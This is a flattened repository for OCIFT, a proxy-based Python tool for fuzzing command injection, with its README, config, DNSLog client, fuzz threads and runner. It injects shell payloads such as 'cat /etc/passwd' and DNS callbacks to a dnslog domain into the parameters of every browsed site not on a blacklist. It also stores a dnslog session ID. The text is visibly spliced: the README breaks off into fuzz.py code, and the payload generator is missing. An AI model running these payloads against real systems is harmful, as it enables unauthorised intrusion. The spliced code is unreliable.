├── fuzz.conf ├── dnslog.py ├── README.md ├── readme.md ├── make_payload.py ├── fuzz.py └── run.py /fuzz.conf: -------------------------------------------------------------------------------- 1 | # 配置各个参数,以逗号分隔 2 | 3 | [initconfig] 4 | 5 | # 黑名单HOST-为了避免带来不必要的麻烦. 6 | black_hosts =.gov,localhost,127.0.0.1,google,gstatic,cnzz.com,doubleclick,police,mil.cn,gov.cn,gov.com 7 | 8 | # 静态文件黑名单-这些不做Fuzz 9 | url_ext_black =.ico,.flv,.css,.jpg,.png,.jpeg,.gif,.pdf,.ss3,.txt,.rar,.zip,.avi,.mp4,.swf,.wmi,.exe,.mpeg 10 | 11 | # 白名单HOST-为了限制Fuzz的范围, 默认为空-表示对除黑名单范围外的所有地址进行Fuzz. 12 | white_site = 13 | 14 | # 参数名黑名单-如: submit 15 | black_parameters =submit 16 | 17 | # 请求超时-限制每次Fuzz请求超时时间 18 | timeout =3 19 | 20 | # 我的DnsLog地址 21 | my_cloudeye =ano1qu2j.xfkxfk.com 22 | 23 | # 判断是够注入命令执行成功的关键字 24 | checkkeys =110586256,/bin/bash,nameserver,IPv4,Windows IP 25 | 26 | # 用于测试命令注入的基本命令 27 | base_command =cat /etc/resolv.conf,echo 110586256,ipconfig,ping CommandInj.{my_cloudeye} 28 | 29 | # Fuzz线程数 30 | fuzz_count =50 31 | 32 | # fuzz的payload类型, 默认False-表示使用自定义的规则 33 | commix_payload_type =False 34 | 35 | # DnsLog登录会话ID 36 | dnslog_sessionid =q6wvxls223vykg79vkd4dn2b40zd2d1 37 | 38 | # Your Domain 39 | custom_domain =a12s2u2j 40 | 41 | # 记录成功结果的Log文件 42 | 43 | Logfile =rce_success_results.txt 44 | -------------------------------------------------------------------------------- /dnslog.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # author = Komi 4 | 5 | import random 6 | import requests 7 | from string import ascii_lowercase 8 | 9 | 10 | class DNSLog: 11 | def __init__(self): 12 | self.unique = '' 13 | self.sessionid = '' 14 | self.random = ''.join([random.choice(ascii_lowercase) for _ in range(10)]) 15 | self.headers = { 16 | 'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36", 17 | 'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", 18 | 'Referer': "http://dnslog.xfkxfk.com/dnslog/", 19 | 'Accept-Encoding': "gzip, deflate, sdch", 20 | 'Cookie': "sessionid={my_sessionid}".format(my_sessionid=self.sessionid), 21 | } 22 | 23 | def getRandomDomain(self, custom='poc'): 24 | """ 25 | full domain = [random].[custom].[unique].xfkxfk.com 26 | e.g. fezarvgo.poc.helloworld.xfkxfk.com 27 | """ 28 | 29 | self.custom = custom 30 | return '%s.%s.%s.xfkxfk.com' % (self.random, self.custom, self.unique) 31 | 32 | def getDnsRecord(self, timeout=3): 33 | api_base = 'http://dnslog.xfkxfk.com/dnslog/' 34 | return requests.get(api_base, headers=self.headers, timeout=timeout).content 35 | 36 | def getHttpRecord(self, timeout=3): 37 | api_base = 'http://dnslog.xfkxfk.com/httplog/' 38 | return requests.get(api_base, headers=self.headers, timeout=timeout).content 39 | 40 | def verifyDNS(self, domain, timeout=3): 41 | return domain in self.getDnsRecord(timeout) 42 | 43 | def verifyHTTP(self, domain, timeout=3): 44 | return domain in self.getHttpRecord(timeout) 45 | 46 | if __name__ == "__main__": 47 | dnslog = DNSLog() 48 | print dnslog.verifyDNS("xfkxfk") 49 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OCIFT 2 | 一个半自动化命令注入漏洞Fuzz工具(One Semi-automation command injection vulnerability Fuzz tool) 3 | 4 | ## 1. OCIFT是什么 5 | 6 | 一个半自动化命令注入漏洞Fuzz工具(One Semi-automation command injection vulnerability Fuzz tool)简写为:OCIFT 7 | 8 | ## 2. OCIFT有什么用 9 | 10 | 这是一种半自动化的黑盒测试工具,它可以帮助渗透测试人员或代码审计人员在愉快的上网的同时,深度挖掘目标应用系统存在的命令注入漏洞。 11 | 12 | ## 3. OCIFT有什么特点 13 | 14 | * Payload基于Commix生成方式修改而来(需要持续完善). 15 | * 基于浏览器代理的半自动化Fuzz. 16 | * 多线程Fuzz速度快,不影响正常浏览器访问使用. 17 | * 支持设置白名单限制Fuzz范围. 18 | * 支持设置黑名单避免带来不必要的麻烦. 19 | * 支持DNSLog辅助验证 20 | 21 | ## 4. OCIFT实现思路 22 | 23 | 基于Tornado的实现一个代理服务器,解析GET/POST请求提取Fuzz点,带入payload进行Fuzz测试。 24 | 25 | * 文件结构说明 26 | 27 | ` 28 | * 29 | |____run.py 主程序入口 30 | |____dnslog.py DNSLog SDK 31 | |____fuzz.conf 配置文件 32 | |____fuzz.py Fuzz线程 33 | |____make_payload.py Payload生成器 34 | |____readme.md 说明文档` 35 | 36 | ## 5. 配置文件说明 37 | 38 | * 配置各个参数,以逗号分隔 39 | 40 | `[initconfig]` 41 | 42 | * 黑名单HOST-为了避免带来不必要的麻烦 43 | 44 | `black_hosts =.gov,localhost,127.0.0.1,google,gstatic,cnzz.com,doubleclick,police,mil.cn,gov.cn,gov.com` 45 | 46 | * 静态文件黑名单-这些不做Fuzz 47 | 48 | `url_ext_black =.ico,.flv,.css,.jpg,.png,.jpeg,.gif,.pdf,.ss3,.txt,.rar,.zip,.avi,.mp4,.swf,.wmi,.exe,.mpeg` 49 | 50 | * 白名单HOST-为了限制Fuzz的范围, 默认为空-表示对除黑名单范围外的所有地址进行Fuzz. 51 | 52 | `white_site =qunar` 53 | 54 | * 请求超时-限制每次Fuzz请求超时时间 55 | 56 | `timeout =10` 57 | 58 | * 我的DnsLog地址 59 | 60 | `my_cloudeye =ano1qu2j.xfkxfk.com` 61 | 62 | * 判断是够注入命令执行成功的关键字 63 | 64 | `checkkeys =110586256,/bin/bash,nameserver,IPv4,Windows IP` 65 | 66 | * 用于测试命令注入的基本命令 67 | 68 | `base_command =cat /etc/resolv.conf,echo 110586256,cat /etc/passwd,ipconfig,ping CommandInj.{my_cloudeye},echo 110586256[^_]\w*)=)(?P[^&#]+)", base_url): 91 | in_black_param = self.check_in_keys(match.group("parameter"), self.black_parameters) 92 | if in_black_param: 93 | continue 94 | 95 | print "[GET] Fuzzing "+match.group("parameter") 96 | for payload_item in fuzzing_payloads: 97 | if self.my_cloudeye in payload_item: 98 | payload_item = payload_item.replace(self.my_cloudeye, TAG+"."+self.my_cloudeye) 99 | payload_item = match.group("value")+payload_item 100 | # ip=1.1.1.1;whoami 101 | fuzzing_uri_append = base_url.replace('%s=%s' % (match.group("parameter"), match.group("value")),'%s=%s' % (match.group("parameter"), match.group("value")+payload_item)) 102 | request['uri'] = fuzzing_uri_append 103 | isVuln_a = self.HttpHelper(request, TAG) 104 | 105 | # ip=;whoami 106 | fuzzing_uri_replace = base_url.replace('%s=%s' % (match.group("parameter"), match.group("value")), '%s=%s' % (match.group("parameter"), payload_item)) 107 | request['uri'] = fuzzing_uri_replace 108 | isVuln_r = self.HttpHelper(request, TAG) 109 | 110 | # 任意一个测试成功都结束Fuzz 111 | if isVuln_a or isVuln_r: 112 | self.FileHelper("GET", base_url, match.group("parameter"), payload_item, TAG) 113 | print "[+] Fuzzing Done!!" 114 | return 115 | print "[+] Fuzzing Done!!" 116 | return 117 | 118 | # Fuzzing_POST请求 119 | def Fuzzing_POST(self, request): 120 | fuzzing_payloads = self.fuzzing_payloads_list 121 | base_url = request['uri'] 122 | TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) 123 | 124 | post_body = request['body'] 125 | for match in re.finditer(r"((\A|[?&])(?P[^_]\w*)=)(?P[^&#]+)", post_body): 126 | in_black_param = self.check_in_keys(match.group("parameter"), self.black_parameters) 127 | if in_black_param: 128 | continue 129 | 130 | try: 131 | print "[POST] Fuzzing "+match.group("parameter") 132 | for payload_item in fuzzing_payloads: 133 | if self.my_cloudeye in payload_item: 134 | payload_item = payload_item.replace(self.my_cloudeye, TAG+"."+self.my_cloudeye) 135 | payload_item = match.group("value")+payload_item 136 | fuzzing_post_body = post_body.replace('%s=%s' % (match.group("parameter"), match.group("value")),'%s=%s' % (match.group("parameter"), payload_item)) 137 | request['body'] = fuzzing_post_body 138 | isOver = self.HttpHelper(request, TAG) 139 | if isOver: 140 | self.FileHelper("POST", base_url, match.group("parameter"), payload_item, TAG) 141 | print "[success] Fuzzing Done!!" 142 | return 143 | print "[failed] Fuzzing Done!!" 144 | except : 145 | pass 146 | return 147 | 148 | # header暂时不支持Fuzzing 149 | def Fuzzing_HEADER(self, request): 150 | print "Fuzzing HEADER" 151 | # headers_map = request['headers'].get_all() 152 | # for (k,v) in headers_map: 153 | # print "%s - %s" % (k,v) 154 | 155 | # 记录到文件 156 | def FileHelper(self, HTTP_Method, Rce_URL, parameter, payload, TAG): 157 | wfile = open(self.Logfile, mode='a+') 158 | found_rce_text = '''\n\ 159 | +==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==+ 160 | +=+TAG: {TAG} 161 | +=+URL: {RCE_URL} 162 | +=+method: {HTTP_Method} 163 | +=+param: {parameter} 164 | +=+payload: {payload} 165 | +==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==+\n 166 | ''' 167 | found_rce_text = found_rce_text.replace("{TAG}", TAG).replace("{RCE_URL}", Rce_URL).replace("{HTTP_Method}", HTTP_Method).replace("{parameter}", parameter).replace("{payload}", payload) 168 | 169 | print found_rce_text 170 | 171 | wfile.write(found_rce_text) 172 | wfile.write("\r\n") 173 | wfile.flush() 174 | wfile.close() 175 | 176 | def check_in_keys(self, uri, keys_list): 177 | uri = uri.lower() 178 | 179 | if len(keys_list) == 0: 180 | return False 181 | else: 182 | for k in keys_list: 183 | if k.lower() in uri: 184 | return True 185 | return False 186 | 187 | def check_url_blackext(self, uri): 188 | not_staticFlag = True 189 | url_ext = urlparse(uri).path[-5:].lower() 190 | 191 | if ".js" in uri and ".jsp" not in url_ext: 192 | not_staticFlag = False 193 | else: 194 | for u in self.url_ext_blacklist: 195 | if u in url_ext: 196 | not_staticFlag = False 197 | 198 | return not_staticFlag 199 | 200 | 201 | def run(self): 202 | while True: 203 | try: 204 | request = self.queue.get() 205 | uri = request['uri'] 206 | hash_value = self.HASH_Calc(requests_dict=request) 207 | in_white_site = self.check_in_keys(uri, self.white_site) 208 | in_black_site = self.check_in_keys(uri, self.black_site) 209 | 210 | is_notstatic = self.check_url_blackext(uri) 211 | 212 | # 判断是否已经Fuzzing过了、URL是否在测试范围内、是否在黑名单里、是否是静态文件 213 | if hash_value not in self.fuzzing_finished_hash and in_white_site and not in_black_site and is_notstatic: 214 | self.fuzzing_finished_hash.append(hash_value) 215 | method = request['method'] 216 | if "POST" in method: 217 | self.Fuzzing_POST(request) 218 | elif "GET" in method: 219 | self.Fuzzing_GET(request) 220 | except: 221 | pass 222 | -------------------------------------------------------------------------------- /run.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Time : 17/4/8 上午00:00 4 | # @Author : Komi 5 | # @File : run.py 6 | # @Ver: : 0.1 7 | 8 | helpinfo = '''\ 9 | ########################################################## 10 | # _____ ______ ___ _____ __ __ # 11 | # / ___ \ / ____/ | | |_ _ | |_____| # 12 | # / / \ \ / / | | | |_ | | # 13 | # | \___ / / | \ ____ | | | _| | | # 14 | # \ __ __/ \ ____ / |___| |_| |___| v1.0 # 15 | ########################################################## 16 | # 一个半自动化命令注入漏洞Fuzz工具 17 | Named From: OCIFT(OS Command Injection Fuzzy Tool) 18 | Referer: 19 | https://github.com/commixproject/commix 20 | https://www.owasp.org/index.php/Command_Injection 21 | Instructions: 22 | 1、python osift.py 8081 (开启8081作为代理端口) 23 | 2、浏览器设置通过代理地址: http://127.0.0.1:8081进行访问 24 | 3、测试结果会记录在日志文件里,默认: rce_success_results.txt 25 | ''' 26 | print helpinfo 27 | 28 | import logging 29 | import socket 30 | import string 31 | import random 32 | from urlparse import urlparse 33 | import os,sys 34 | from Queue import Queue 35 | import threading 36 | import tornado.httpserver 37 | import tornado.ioloop 38 | import tornado.iostream 39 | import tornado.web 40 | from tornado.web import RequestHandler 41 | import tornado.httpclient 42 | from fuzz import CIF_Fuzz 43 | from make_payload import PayloadGenerate 44 | import ConfigParser 45 | 46 | # logging.basicConfig(level=logging.ERROR) 47 | 48 | class ProxyManage: 49 | def run_proxy(self, address, port, handler): 50 | '''' 51 | Start proxy server 52 | ''' 53 | app = tornado.web.Application([ 54 | (r'.*', handler), 55 | ]) 56 | app.listen(port, address) 57 | logging.info("Starting HTTP proxy on {0}".format(address + ':' + str(port))) 58 | ioloop = tornado.ioloop.IOLoop.instance() 59 | ioloop.start() 60 | 61 | def close_proxy(self): 62 | ioloop = tornado.ioloop.IOLoop.instance() 63 | logging.info('stop proxy server') 64 | ioloop.stop() 65 | 66 | def get_proxy(url): 67 | url_parsed = urlparse(url, scheme='http') 68 | proxy_key = '%s_proxy' % url_parsed.scheme 69 | return os.environ.get(proxy_key) 70 | 71 | def parse_proxy(proxy): 72 | proxy_parsed = urlparse(proxy, scheme='http') 73 | return proxy_parsed.hostname, proxy_parsed.port 74 | 75 | def fetch_request(url, callback, **kwargs): 76 | proxy = get_proxy(url) 77 | if proxy: 78 | tornado.httpclient.AsyncHTTPClient.configure( 79 | 'tornado.curl_httpclient.CurlAsyncHTTPClient') 80 | host, port = parse_proxy(proxy) 81 | kwargs['proxy_host'] = host 82 | kwargs['proxy_port'] = port 83 | 84 | req = tornado.httpclient.HTTPRequest(url, **kwargs) 85 | client = tornado.httpclient.AsyncHTTPClient() 86 | client.fetch(req, callback, raise_error="error") 87 | 88 | class LoadConfig: 89 | def __init__(self): 90 | self.version = "V1.0" 91 | 92 | def read_config(self): 93 | self.conf = ConfigParser.SafeConfigParser() 94 | self.conf.read('fuzz.conf') 95 | self.initconfig = self.conf.items('initconfig') 96 | 97 | def get_configprperity(self, key=""): 98 | 99 | for tmp in self.initconfig: 100 | if key == tmp[0] and key != "": 101 | return tmp[1] 102 | 103 | class ProxyHandler(RequestHandler): 104 | SUPPORTED_METHODS = ['GET', 'POST', 'CONNECT', "OPTIONS"] 105 | queue = Queue() 106 | print "[+] Load configuration file..." 107 | 108 | londconf = LoadConfig() 109 | londconf.read_config() 110 | londconf.get_configprperity() 111 | 112 | my_cloudeye = londconf.get_configprperity('my_cloudeye') 113 | white_site = londconf.get_configprperity('white_site') 114 | black_site = londconf.get_configprperity('black_hosts') 115 | checkkeys = londconf.get_configprperity('checkkeys') 116 | checkkey_list = checkkeys.split(",") 117 | fuzz_count = londconf.get_configprperity('fuzz_count') 118 | custom_domain = londconf.get_configprperity('custom_domain') 119 | dnslog_sessionid = londconf.get_configprperity('dnslog_sessionid') 120 | commix_payload_type = londconf.get_configprperity('commix_payload_type') 121 | url_ext_black = londconf.get_configprperity('url_ext_black') 122 | black_parameters = londconf.get_configprperity('black_parameters') 123 | 124 | Logfile = londconf.get_configprperity('Logfile') 125 | 126 | base_command = londconf.get_configprperity("base_command") 127 | 128 | base_command_list = [] 129 | for base_command in base_command.split(","): 130 | base_command_list.append(base_command.format(my_cloudeye=my_cloudeye)) 131 | 132 | timeout = londconf.get_configprperity("timeout") 133 | print "[+] Initialize Payloads..." 134 | PayloadME = PayloadGenerate(base_command_list) 135 | if commix_payload_type == "False": 136 | PayloadME.fuzz_mypayloads() 137 | else: 138 | TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) 139 | PayloadME.make_commix_payloads(TAG=TAG) 140 | checkkey_list.append(TAG) 141 | 142 | fuzzing_payloads_list = list(set(PayloadME.fuzzing_payloads_list)) 143 | print "[+] we have %s payloads " % len(fuzzing_payloads_list) 144 | 145 | print "[+] Start Fuzzing Threads..." 146 | for i in range(0, int(fuzz_count)): 147 | cifz = CIF_Fuzz(queue=queue) 148 | cifz.fuzzing_payloads_list = PayloadME.fuzzing_payloads_list 149 | cifz.CheckKey_list = checkkey_list 150 | cifz.my_cloudeye = my_cloudeye 151 | cifz.url_ext_blacklist = url_ext_black.split(",") 152 | cifz.dnslog_sessionid = dnslog_sessionid 153 | cifz.Logfile = Logfile 154 | cifz.custom_domain = custom_domain 155 | cifz.white_site = white_site.split(",") 156 | cifz.black_site = black_site.split(",") 157 | cifz.black_parameters = black_parameters.split(",") 158 | cifz.timeout = int(timeout) 159 | cifz.start() 160 | print "[+] Everything is ready." 161 | @tornado.web.asynchronous 162 | def get(self): 163 | def handle_response(response): 164 | if (response.error and not 165 | isinstance(response.error, tornado.httpclient.HTTPError)): 166 | self.set_status(500) 167 | self.write('Internal server error:\n' + str(response.error)) 168 | else: 169 | self.set_status(response.code, response.reason) 170 | self._headers = tornado.httputil.HTTPHeaders() # clear tornado default header 171 | 172 | for header, v in response.headers.get_all(): 173 | if header not in ('Content-Length', 'Transfer-Encoding', 'Content-Encoding', 'Connection'): 174 | self.add_header(header, v) # some header appear multiple times, eg 'Set-Cookie' 175 | 176 | if response.body: 177 | self.set_header('Content-Length', len(response.body)) 178 | self.write(response.body) 179 | self.finish() 180 | 181 | body = self.request.body 182 | if not body: 183 | body = None 184 | 185 | try: 186 | 187 | if 'Proxy-Connection' in self.request.headers: 188 | del self.request.headers['Proxy-Connection'] 189 | 190 | fetch_request( 191 | self.request.uri, handle_response, 192 | method=self.request.method, body=body, 193 | headers=self.request.headers, follow_redirects=False, 194 | allow_nonstandard_methods=True) 195 | 196 | request_dict = {} 197 | request_dict['uri'] = self.request.uri 198 | request_dict['method'] = self.request.method 199 | request_dict['headers'] = self.request.headers 200 | request_dict['body'] = body 201 | self.queue.put(request_dict) 202 | 203 | except tornado.httpclient.HTTPError as e: 204 | if hasattr(e, 'response') and e.response: 205 | handle_response(e.response) 206 | else: 207 | self.set_status(500) 208 | self.write('Internal server error:\n' + str(e)) 209 | self.finish() 210 | 211 | @tornado.web.asynchronous 212 | def post(self): 213 | return self.get() 214 | 215 | @tornado.web.asynchronous 216 | def options(self): 217 | return self.get() 218 | 219 | @tornado.web.asynchronous 220 | def connect(self): 221 | host, port = self.request.uri.split(':') 222 | client = self.request.connection.stream 223 | 224 | def read_from_client(data): 225 | upstream.write(data) 226 | 227 | def read_from_upstream(data): 228 | client.write(data) 229 | 230 | def client_close(data=None): 231 | if upstream.closed(): 232 | return 233 | if data: 234 | upstream.write(data) 235 | upstream.close() 236 | 237 | def upstream_close(data=None): 238 | if client.closed(): 239 | return 240 | if data: 241 | client.write(data) 242 | client.close() 243 | 244 | def start_tunnel(): 245 | client.read_until_close(client_close, read_from_client) 246 | upstream.read_until_close(upstream_close, read_from_upstream) 247 | client.write(b'HTTP/1.0 200 Connection established\r\n\r\n') 248 | 249 | def on_proxy_response(data=None): 250 | if data: 251 | first_line = data.splitlines()[0] 252 | http_v, status, text = first_line.split(None, 2) 253 | if int(status) == 200: 254 | start_tunnel() 255 | return 256 | 257 | self.set_status(500) 258 | self.finish() 259 | 260 | def start_proxy_tunnel(): 261 | upstream.write('CONNECT %s HTTP/1.1\r\n' % self.request.uri) 262 | upstream.write('Host: %s\r\n' % self.request.uri) 263 | upstream.write('Proxy-Connection: Keep-Alive\r\n\r\n') 264 | upstream.read_until('\r\n\r\n', on_proxy_response) 265 | 266 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) 267 | upstream = tornado.iostream.IOStream(s) 268 | 269 | proxy = get_proxy(self.request.uri) 270 | if proxy: 271 | proxy_host, proxy_port = parse_proxy(proxy) 272 | upstream.connect((proxy_host, proxy_port), start_proxy_tunnel) 273 | else: 274 | upstream.connect((host, int(port)), start_tunnel) 275 | 276 | 277 | class RunProxyThread(threading.Thread): 278 | def __init__(self, handler, host, port): 279 | self.host = host 280 | self.port = port 281 | self.handler = handler 282 | threading.Thread.__init__(self) 283 | 284 | def run(self): 285 | ProxyManage().run_proxy(self.host, self.port, self.handler) 286 | 287 | if __name__ == "__main__": 288 | port = 8888 289 | if len(sys.argv) > 1: 290 | port = int(sys.argv[1]) 291 | print "[*] Starting HTTP proxy at: http://127.0.0.1:%d" % port 292 | 293 | os.system('pkill -f "python run.py"') 294 | 295 | RunProxyThread(ProxyHandler, '127.0.0.1', int(port)).run() 296 | 297 | --------------------------------------------------------------------------------